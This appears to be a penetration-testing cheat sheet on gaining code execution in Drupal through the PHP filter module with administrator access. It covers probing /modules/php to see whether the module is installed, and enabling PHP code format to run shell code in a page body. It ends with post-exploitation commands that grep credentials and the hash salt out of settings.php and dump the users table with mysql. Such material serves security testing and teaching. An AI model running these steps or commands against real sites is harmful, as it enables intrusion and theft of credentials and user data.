RCE with Admin Credentials
The PHP plugin is meant to be used for PHP code and the issue here is that the attacker is not supposed to have access to an administrator account
Interesting info about PHP filter
Requirements:
- The
PHP pluginto be installed on the application - Access to an
administrator account
How to check existing plugins?
The default path for Drupal plugins
/modules/<plugin_name>
When it comes to checking what plugins are installed on the application, it does not require authentication.
To do this, send a GET request towards the following endpoint to check if the PHP plugin exists:
/modules/php
| Response Code | Intel Info |
|---|---|
403 Forbidden | Plugin is Installed |
404 Not Found | Plugin is not Installed |
Performing the RCE
This is the part where Admin access is required.
Finding the PHP filter plugin
- Login to the application with the
Administrator account - Navigate to the
Modulessection and note thePHP filterplugin enabled/disabled
- Press
Save configuration>Add content>Basic Page||Article - Write the
PHP shell codewithin theBody - Select
PHP codein theText formatmenu
- STONKS!
POST Exploitation
- Read
settings.php
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
- Dump users from DB (Adapt it accordingly)
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'